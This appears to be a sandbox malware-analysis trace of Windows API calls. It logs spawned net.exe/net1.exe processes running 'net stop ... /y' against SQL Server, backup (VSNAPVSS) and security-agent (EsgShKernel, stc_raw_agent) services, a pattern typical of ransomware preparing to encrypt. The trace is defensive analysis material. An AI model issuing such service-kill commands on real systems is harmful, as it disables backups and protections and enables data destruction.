_wcsupr (in: _String="MSSQL$SQLEXPRESS" | out: _String="MSSQL$SQLEXPRESS") returned="MSSQL$SQLEXPRESS" [0106.028] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4e5448 [0106.031] GetServiceKeyNameW (in: hSCManager=0x4e5448, lpDisplayName="MSSQL$SQLEXPRESS", lpServiceName=0x3faaf0, lpcchBuffer=0x29fdb0 | out: lpServiceName="", lpcchBuffer=0x29fdb0) returned 0 [0106.031] _wcsicmp (_String1="msg", _String2="MSSQL$SQLEXPRESS") returned -12 [0106.031] _wcsicmp (_String1="messenger", _String2="MSSQL$SQLEXPRESS") returned -14 [0106.031] _wcsicmp (_String1="receiver", _String2="MSSQL$SQLEXPRESS") returned 5 [0106.032] _wcsicmp (_String1="rcv", _String2="MSSQL$SQLEXPRESS") returned 5 [0106.032] _wcsicmp (_String1="redirector", _String2="MSSQL$SQLEXPRESS") returned 5 [0106.032] _wcsicmp (_String1="redir", _String2="MSSQL$SQLEXPRESS") returned 5 [0106.032] _wcsicmp (_String1="rdr", _String2="MSSQL$SQLEXPRESS") returned 5 [0106.032] _wcsicmp (_String1="workstation", _String2="MSSQL$SQLEXPRESS") returned 10 [0106.032] _wcsicmp (_String1="work", _String2="MSSQL$SQLEXPRESS") returned 10 [0106.032] _wcsicmp (_String1="wksta", _String2="MSSQL$SQLEXPRESS") returned 10 [0106.032] _wcsicmp (_String1="prdr", _String2="MSSQL$SQLEXPRESS") returned 3 [0106.032] _wcsicmp (_String1="devrdr", _String2="MSSQL$SQLEXPRESS") returned -9 [0106.032] _wcsicmp (_String1="lanmanworkstation", _String2="MSSQL$SQLEXPRESS") returned -1 [0106.032] _wcsicmp (_String1="server", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.032] _wcsicmp (_String1="svr", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.032] _wcsicmp (_String1="srv", _String2="MSSQL$SQLEXPRESS") returned 6 [0106.032] _wcsicmp (_String1="lanmanserver", _String2="MSSQL$SQLEXPRESS") returned -1 [0106.032] _wcsicmp (_String1="alerter", _String2="MSSQL$SQLEXPRESS") returned -12 [0106.032] _wcsicmp (_String1="netlogon", _String2="MSSQL$SQLEXPRESS") returned 1 [0106.032] NetServiceControl (in: servername=0x0, service="MSSQL$SQLEXPRESS", opcode=0x0, arg=0x0, bufptr=0x29fdac | out: bufptr=0x29fdac) returned 0x889 [0106.033] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0106.033] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0106.034] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0106.034] GetFileType (hFile=0x0) returned 0x0 [0106.034] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4e3e68 [0106.034] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4e3e68, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0106.034] WriteFile (in: hFile=0x0, lpBuffer=0x4e3e68, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x29fcec, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fcec, lpOverlapped=0x0) returned 0 [0106.034] LocalFree (hMem=0x4e3e68) returned 0x0 [0106.034] GetFileType (hFile=0x0) returned 0x0 [0106.035] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e6110 [0106.035] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e6110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0106.035] WriteFile (in: hFile=0x0, lpBuffer=0x4e6110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29fcec, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fcec, lpOverlapped=0x0) returned 0 [0106.035] LocalFree (hMem=0x4e6110) returned 0x0 [0106.035] _ultow (in: _Dest=0x889, _Radix=2751772 | out: _Dest=0x889) returned="2185" [0106.035] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0106.035] GetFileType (hFile=0x0) returned 0x0 [0106.035] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4e6110 [0106.035] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4e6110, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0106.035] WriteFile (in: hFile=0x0, lpBuffer=0x4e6110, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x29fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fcf8, lpOverlapped=0x0) returned 0 [0106.035] LocalFree (hMem=0x4e6110) returned 0x0 [0106.035] GetFileType (hFile=0x0) returned 0x0 [0106.035] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4e6110 [0106.035] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4e6110, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nN", lpUsedDefaultChar=0x0) returned 2 [0106.035] WriteFile (in: hFile=0x0, lpBuffer=0x4e6110, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x29fcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x29fcf8, lpOverlapped=0x0) returned 0 [0106.035] LocalFree (hMem=0x4e6110) returned 0x0 [0106.035] NetApiBufferFree (Buffer=0x4e1af8) returned 0x0 [0106.035] NetApiBufferFree (Buffer=0x4e1b10) returned 0x0 [0106.036] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop MSSQL$SQLEXPRESS /y" [0106.036] exit (_Code=2) Process: id = "126" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x246e5000" os_pid = "0xbfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "61" os_parent_pid = "0xcd0" cmd_line = "C:\\Windows\\system32\\net1 stop VSNAPVSS /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 497 os_tid = 0xde0 [0105.985] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14fbdc | out: lpSystemTimeAsFileTime=0x14fbdc*(dwLowDateTime=0x1432c130, dwHighDateTime=0x1d6f0d1)) [0105.985] GetCurrentProcessId () returned 0xbfc [0105.985] GetCurrentThreadId () returned 0xde0 [0105.985] GetTickCount () returned 0x114e61b [0105.985] QueryPerformanceCounter (in: lpPerformanceCount=0x14fbd4 | out: lpPerformanceCount=0x14fbd4*=22508620305) returned 1 [0105.986] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0105.986] __set_app_type (_Type=0x1) [0105.986] __p__fmode () returned 0x770331f4 [0105.986] __p__commode () returned 0x770331fc [0105.986] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0105.986] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0105.986] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0105.986] GetConsoleOutputCP () returned 0x1b5 [0105.986] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0105.986] SetThreadUILanguage (LangId=0x0) returned 0x409 [0105.989] sprintf_s (in: _DstBuf=0x14fb94, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0105.990] setlocale (category=0, locale=".437") returned="English_United States.437" [0105.991] GetStdHandle (nStdHandle=0xfffffff5) returned 0x40c [0105.991] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0105.991] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VSNAPVSS /y" [0105.991] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x14f960, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0105.991] RtlAllocateHeap (HeapHandle=0x4b0000, Flags=0x0, Size=0x64) returned 0x4c3ad8 [0105.991] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0105.991] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14fb64 | out: Buffer=0x14fb64*=0x4c1ae0) returned 0x0 [0105.992] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x14fb64 | out: Buffer=0x14fb64*=0x4c1af8) returned 0x0 [0105.992] _fileno (_File=0x77032900) returned -2 [0105.992] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0105.992] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0105.992] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0105.992] _wcsicmp (_String1="config", _String2="stop") returned -16 [0105.992] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0105.992] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0105.992] _wcsicmp (_String1="file", _String2="stop") returned -13 [0105.992] _wcsicmp (_String1="files", _String2="stop") returned -13 [0105.992] _wcsicmp (_String1="group", _String2="stop") returned -12 [0105.992] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0105.992] _wcsicmp (_String1="help", _String2="stop") returned -11 [0105.992] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0105.992] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0105.992] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0105.992] _wcsicmp (_String1="session", _String2="stop") returned -15 [0105.992] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0105.992] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0105.992] _wcsicmp (_String1="share", _String2="stop") returned -12 [0105.992] _wcsicmp (_String1="start", _String2="stop") returned -14 [0105.992] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0105.992] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0105.992] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0105.992] _wcsicmp (_String1="accounts", _String2="VSNAPVSS") returned -21 [0105.992] _wcsicmp (_String1="computer", _String2="VSNAPVSS") returned -19 [0105.992] _wcsicmp (_String1="config", _String2="VSNAPVSS") returned -19 [0105.992] _wcsicmp (_String1="continue", _String2="VSNAPVSS") returned -19 [0105.992] _wcsicmp (_String1="cont", _String2="VSNAPVSS") returned -19 [0105.992] _wcsicmp (_String1="file", _String2="VSNAPVSS") returned -16 [0105.992] _wcsicmp (_String1="files", _String2="VSNAPVSS") returned -16 [0105.992] _wcsicmp (_String1="group", _String2="VSNAPVSS") returned -15 [0105.992] _wcsicmp (_String1="groups", _String2="VSNAPVSS") returned -15 [0105.992] _wcsicmp (_String1="help", _String2="VSNAPVSS") returned -14 [0105.992] _wcsicmp (_String1="helpmsg", _String2="VSNAPVSS") returned -14 [0105.993] _wcsicmp (_String1="localgroup", _String2="VSNAPVSS") returned -10 [0105.993] _wcsicmp (_String1="pause", _String2="VSNAPVSS") returned -6 [0105.993] _wcsicmp (_String1="session", _String2="VSNAPVSS") returned -3 [0105.993] _wcsicmp (_String1="sessions", _String2="VSNAPVSS") returned -3 [0105.993] _wcsicmp (_String1="sess", _String2="VSNAPVSS") returned -3 [0105.993] _wcsicmp (_String1="share", _String2="VSNAPVSS") returned -3 [0105.993] _wcsicmp (_String1="start", _String2="VSNAPVSS") returned -3 [0105.993] _wcsicmp (_String1="stats", _String2="VSNAPVSS") returned -3 [0105.993] _wcsicmp (_String1="statistics", _String2="VSNAPVSS") returned -3 [0105.993] _wcsicmp (_String1="stop", _String2="VSNAPVSS") returned -3 [0105.993] _wcsicmp (_String1="time", _String2="VSNAPVSS") returned -2 [0105.993] _wcsicmp (_String1="user", _String2="VSNAPVSS") returned -1 [0105.993] _wcsicmp (_String1="users", _String2="VSNAPVSS") returned -1 [0105.993] _wcsicmp (_String1="msg", _String2="VSNAPVSS") returned -9 [0105.993] _wcsicmp (_String1="messenger", _String2="VSNAPVSS") returned -9 [0105.993] _wcsicmp (_String1="receiver", _String2="VSNAPVSS") returned -4 [0105.993] _wcsicmp (_String1="rcv", _String2="VSNAPVSS") returned -4 [0105.993] _wcsicmp (_String1="netpopup", _String2="VSNAPVSS") returned -8 [0105.993] _wcsicmp (_String1="redirector", _String2="VSNAPVSS") returned -4 [0105.993] _wcsicmp (_String1="redir", _String2="VSNAPVSS") returned -4 [0105.993] _wcsicmp (_String1="rdr", _String2="VSNAPVSS") returned -4 [0105.993] _wcsicmp (_String1="workstation", _String2="VSNAPVSS") returned 1 [0105.993] _wcsicmp (_String1="work", _String2="VSNAPVSS") returned 1 [0105.993] _wcsicmp (_String1="wksta", _String2="VSNAPVSS") returned 1 [0105.993] _wcsicmp (_String1="prdr", _String2="VSNAPVSS") returned -6 [0105.993] _wcsicmp (_String1="devrdr", _String2="VSNAPVSS") returned -18 [0105.993] _wcsicmp (_String1="lanmanworkstation", _String2="VSNAPVSS") returned -10 [0105.993] _wcsicmp (_String1="server", _String2="VSNAPVSS") returned -3 [0105.993] _wcsicmp (_String1="svr", _String2="VSNAPVSS") returned -3 [0105.993] _wcsicmp (_String1="srv", _String2="VSNAPVSS") returned -3 [0105.993] _wcsicmp (_String1="lanmanserver", _String2="VSNAPVSS") returned -10 [0105.993] _wcsicmp (_String1="alerter", _String2="VSNAPVSS") returned -21 [0105.993] _wcsicmp (_String1="netlogon", _String2="VSNAPVSS") returned -8 [0105.994] _wcsupr (in: _String="VSNAPVSS" | out: _String="VSNAPVSS") returned="VSNAPVSS" [0105.994] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x4c54a8 [0105.996] GetServiceKeyNameW (in: hSCManager=0x4c54a8, lpDisplayName="VSNAPVSS", lpServiceName=0x3faaf0, lpcchBuffer=0x14fb00 | out: lpServiceName="", lpcchBuffer=0x14fb00) returned 0 [0105.996] _wcsicmp (_String1="msg", _String2="VSNAPVSS") returned -9 [0105.996] _wcsicmp (_String1="messenger", _String2="VSNAPVSS") returned -9 [0105.996] _wcsicmp (_String1="receiver", _String2="VSNAPVSS") returned -4 [0105.996] _wcsicmp (_String1="rcv", _String2="VSNAPVSS") returned -4 [0105.996] _wcsicmp (_String1="redirector", _String2="VSNAPVSS") returned -4 [0105.996] _wcsicmp (_String1="redir", _String2="VSNAPVSS") returned -4 [0105.996] _wcsicmp (_String1="rdr", _String2="VSNAPVSS") returned -4 [0105.996] _wcsicmp (_String1="workstation", _String2="VSNAPVSS") returned 1 [0105.996] _wcsicmp (_String1="work", _String2="VSNAPVSS") returned 1 [0105.996] _wcsicmp (_String1="wksta", _String2="VSNAPVSS") returned 1 [0105.997] _wcsicmp (_String1="prdr", _String2="VSNAPVSS") returned -6 [0105.997] _wcsicmp (_String1="devrdr", _String2="VSNAPVSS") returned -18 [0105.997] _wcsicmp (_String1="lanmanworkstation", _String2="VSNAPVSS") returned -10 [0105.997] _wcsicmp (_String1="server", _String2="VSNAPVSS") returned -3 [0105.997] _wcsicmp (_String1="svr", _String2="VSNAPVSS") returned -3 [0105.997] _wcsicmp (_String1="srv", _String2="VSNAPVSS") returned -3 [0105.997] _wcsicmp (_String1="lanmanserver", _String2="VSNAPVSS") returned -10 [0105.997] _wcsicmp (_String1="alerter", _String2="VSNAPVSS") returned -21 [0105.997] _wcsicmp (_String1="netlogon", _String2="VSNAPVSS") returned -8 [0105.997] NetServiceControl (in: servername=0x0, service="VSNAPVSS", opcode=0x0, arg=0x0, bufptr=0x14fafc | out: bufptr=0x14fafc) returned 0x889 [0105.998] wcscpy_s (in: _Destination=0x3fa4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0105.998] LoadLibraryW (lpLibFileName="NETMSG") returned 0x71be0000 [0105.998] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x71be0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0105.999] GetFileType (hFile=0x0) returned 0x0 [0105.999] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x4c3ec0 [0105.999] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x4c3ec0, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0105.999] WriteFile (in: hFile=0x0, lpBuffer=0x4c3ec0, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x14fa3c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14fa3c, lpOverlapped=0x0) returned 0 [0105.999] LocalFree (hMem=0x4c3ec0) returned 0x0 [0105.999] GetFileType (hFile=0x0) returned 0x0 [0105.999] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4c6170 [0105.999] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4c6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nL", lpUsedDefaultChar=0x0) returned 2 [0105.999] WriteFile (in: hFile=0x0, lpBuffer=0x4c6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14fa3c, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14fa3c, lpOverlapped=0x0) returned 0 [0105.999] LocalFree (hMem=0x4c6170) returned 0x0 [0106.000] _ultow (in: _Dest=0x889, _Radix=1374828 | out: _Dest=0x889) returned="2185" [0106.000] FormatMessageW (in: dwFlags=0x2800, lpSource=0x71be0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x3fb338, nSize=0x800, Arguments=0x3f9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0106.000] GetFileType (hFile=0x0) returned 0x0 [0106.000] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x4c6170 [0106.000] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x4c6170, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0106.000] WriteFile (in: hFile=0x0, lpBuffer=0x4c6170, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x14fa48, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14fa48, lpOverlapped=0x0) returned 0 [0106.000] LocalFree (hMem=0x4c6170) returned 0x0 [0106.000] GetFileType (hFile=0x0) returned 0x0 [0106.000] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x4c6170 [0106.000] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x4c6170, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nL", lpUsedDefaultChar=0x0) returned 2 [0106.000] WriteFile (in: hFile=0x0, lpBuffer=0x4c6170, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x14fa48, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x14fa48, lpOverlapped=0x0) returned 0 [0106.000] LocalFree (hMem=0x4c6170) returned 0x0 [0106.000] NetApiBufferFree (Buffer=0x4c1ae0) returned 0x0 [0106.001] NetApiBufferFree (Buffer=0x4c1af8) returned 0x0 [0106.001] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop VSNAPVSS /y" [0106.001] exit (_Code=2) Process: id = "127" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x23c1e000" os_pid = "0xe84" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop ReportServer /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 498 os_tid = 0x974 Process: id = "128" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x25023000" os_pid = "0xb7c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x71c" cmd_line = "\"net.exe\" stop EsgShKernel /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 500 os_tid = 0xd60 Process: id = "129" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x256a6000" os_pid = "0xec4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "45" os_parent_pid = "0xc70" cmd_line = "C:\\Windows\\system32\\net1 stop stc_raw_agent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Programs\\Temp\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000eb41" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 503 os_tid = 0xbcc [0106.710] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ff9cc | out: lpSystemTimeAsFileTime=0x2ff9cc*(dwLowDateTime=0x14a04070, dwHighDateTime=0x1d6f0d1)) [0106.710] GetCurrentProcessId () returned 0xec4 [0106.710] GetCurrentThreadId () returned 0xbcc [0106.710] GetTickCount () returned 0x114e8e9 [0106.710] QueryPerformanceCounter (in: lpPerformanceCount=0x2ff9c4 | out: lpPerformanceCount=0x2ff9c4*=22581068739) returned 1 [0106.710] GetModuleHandleA (lpModuleName=0x0) returned 0x3e0000 [0106.710] __set_app_type (_Type=0x1) [0106.710] __p__fmode () returned 0x770331f4 [0106.710] __p__commode () returned 0x770331fc [0106.711] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x3effe6) returned 0x0 [0106.711] __getmainargs (in: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068, _DoWildCard=0, _StartInfo=0x3f9024 | out: _Argc=0x3f9064, _Argv=0x3f906c, _Env=0x3f9068) returned 0 [0106.711] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0106.711] GetConsoleOutputCP () returned 0x1b5 [0106.712] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3f9080 | out: lpCPInfo=0x3f9080) returned 1 [0106.712] SetThreadUILanguage (LangId=0x0) returned 0x409 [0106.715] sprintf_s (in: _DstBuf=0x2ff984, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0106.715] setlocale (category=0, locale=".437") returned="English_United States.437" [0106.717] GetStdHandle (nStdHandle=0xfffffff5) returned 0x40c [0106.717] GetStdHandle (nStdHandle=0xfffffff4) returned 0x0 [0106.717] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop stc_raw_agent /y" [0106.717] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x2ff750, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0106.717] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x6e) returned 0x743ae0 [0106.717] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0106.718] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ff954 | out: Buffer=0x2ff954*=0x741ae8) returned 0x0 [0106.718] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x2ff954 | out: Buffer=0x2ff954*=0x741b00) returned 0x0 [0106.718] _fileno (_File=0x77032900) returned -2 [0106.718] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0106.718] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0106.718] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0106.718] _wcsicmp (_String1="config", _String2="stop") returned -16 [0106.718] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0106.718] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0106.718] _wcsicmp (_String1="file", _String2="stop") returned -13 [0106.718] _wcsicmp (_String1="files", _String2="stop") returned -13 [0106.718] _wcsicmp (_String1="group", _String2="stop") returned -12 [0106.718] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0106.718] _wcsicmp (_String1="help", _String2="stop") returned -11 [0106.718] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0106.718] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0106.718] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0106.718] _wcsicmp (_String1="session", _String2="stop") returned -15 [0106.718] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0106.718] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0106.718] _wcsicmp (_String1="share", _String2="stop") returned -12 [0106.718] _wcsicmp (_String1="start", _String2="stop") returned -14 [0106.718] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0106.719] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0106.719] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0106.719] _wcsicmp (_String1="accounts", _String2="stc_raw_agent") returned -18 [0106.719] _wcsicmp (_String1="computer", _String2="stc_raw_agent") returned -16 [0106.719] _wcsicmp (_String1="config", _String2="stc_raw_agent") returned -16 [0106.719] _wcsicmp (_String1="continue", _String2="stc_raw_agent") returned -16 [0106.719] _wcsicmp (_String1="cont", _String2="stc_raw_agent") returned -16 [0106.719] _wcsicmp (_String1="file", _String2="stc_raw_agent") returned -13 [0106.719] _wcsicmp (_String1="files", _String2="stc_raw_agent") returned -13 [0106.719] _wcsicmp (_String1="group", _String2="stc_raw_agent") returned -12 [0106.719] _wcsicmp (_String1="groups", _String2="stc_raw_agent") returned -12 [0106.719] _wcsicmp (_String1="help", _String2="stc_raw_agent") returned -11 [0106.719] _wcsicmp (_String1="helpmsg", _String2="stc_raw_agent") returned -11 [0106.719] _wcsicmp (_String1="localgroup", _String2="stc_raw_agent") returned -7 